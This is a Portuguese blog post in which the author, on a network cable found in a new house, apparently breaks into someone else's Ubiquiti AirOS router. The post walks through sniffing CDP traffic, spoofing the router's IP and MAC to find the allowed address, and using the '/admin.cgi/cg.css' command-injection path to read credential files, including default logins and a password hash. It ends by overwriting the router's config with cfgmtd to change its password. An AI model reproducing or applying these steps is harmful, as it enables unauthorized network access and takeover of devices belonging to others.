quinta-feira, 2 de junho de 2016

Quebrando paradigmas - Descobrir ip liberado do AirOS e também explorando falha do AirOS




Casa nova, cabo novo encontrado.... e ainda mais de rede, nada melhor do que passar alguns minutos verificando o que pode estar passando por ali...

De primeira instancia o cabo de rede plugado e o meu querido linux não pegava IP, ok mais do que previsto, proximo passo vamos verificar pois em AP provavelmente vai ter um HUB então HUB é burro e com isso qualquer pacote que for ou chegar na REDE devera gritar no HUB, com isso consigo pegar o IP...

Então bora rolar "# tcpdump -i etho -vvv" e adivinhem nada!!! Esta cabo esta direto ligado em um aparelho, mas que aparelho....

Então espere mais um pouco e mais um pouco...

Algumas linhas de tcpdump e então percebi que aparecia o NOME do router IP do mesmo...

"
23:15:32.622291 CDPv1, ttl: 120s, checksum: 376 (unverified), length 78
Device-ID (0x01), length: 20 bytes: 'NOME_DO_ROUTER'
Address (0x02), length: 13 bytes: IPv4 (1) 192.168.2.1 <-- IP do Router
Capability (0x04), length: 4 bytes: (0x00000001): Router
Version String (0x05), length: 9 bytes:
 XM.v5.3.3
Platform (0x06), length: 3 bytes: 'LM5'
unknown field type (0xff), length: 1 byte:

"

Então esperei mais um pouco e peguei o MAC deste cara...

O que eu fiz na verdade foi, setar o ip do router no meu notebook juntamente do MAC do router, com isso o trafego veio para a minha maquina, com isso o tcpdump rodando sempre, percebi que existia várias requisições de ARP para um determinado IP 192.168.2.2...

Então relacionei que o IP do host liberado era 192.168.2.2, show de boletas, já tinha o IP liberado, então setei o mesmo no notebook, adivinha... conseguia pingar o router, primeiro passo concluído,  agora so me restava saber se este IP também poderia ser um gateway... então adivinhe "route add default gw 192.168.2.1" e um ping "8.8.8.8" com resposta, isso é muito bom...

A partir disso vamos ver o que roda neste ip 192.168.2.1..

#nmap -sS 192.168.2.1

Existe uma porta 80 e um hardware possivelmente Ubquiti, opa então bora...

http://192.168.2.1

Show de bola, acessou, então eu sabia de tempos que tem uma falha no AirOS, revirei meus documentos e encontrei...

É uma manipulação de arquivos a partir da URL...

http://192.168.2.1/admin.cgi/cg.css

a parte /admin.cgi/cg.css é o arquivo que permite injetar comandos do tipo, ls, cd, cat.....

Alguns arquivos legais...

// Tem usuário e senha armazenados
cat /etc/default.cfg

Neste arquivo temos a senha default que é:
user: ubnt
senha: ubnt
SenhaCriptografada: users.1.password=VvpvCwhccFv6Q

O que eu fiz foi, efetuar o download do arquivo /tmp/system.cfg, alterar a senha, então efetuar upload novamente do arquivo.

Escrever as configurações do arquivo que eu efetuei upload e assim alterar a senha.
# cat /tmp/upload/system.cfg > /tmp/system.cfg

Aplicar a configuração no router com a minha senha, sem alterar a configuração do restante.
# cfgmtd -f /tmp/system.cfg -w && reboot


Abraços

2 comentários :

  1. Respostas
    1. A UBNT criou um protocolo se segurança a partir da versão 5.6.2, se aprender a quebrar me ensina.
      Abraço

      Excluir

Este blog não é destinado apenas para adultos, portanto não seram admitidos propagandas, linguagem impropria, ofensiva ou obsena que caracterize atitudes evidentes de desrespeito ou grosseria e/ou nada que a desperte curiosidade ou a atenção de menores ou contribuir para que eles adotem valores morais ou hábitos incompatíveis com a menoridade.
As pessoas que inflingir estas regras serão denunciadas ao setor de analize de conteúdo do Google podendo ter sua conta encerrada permanentemente.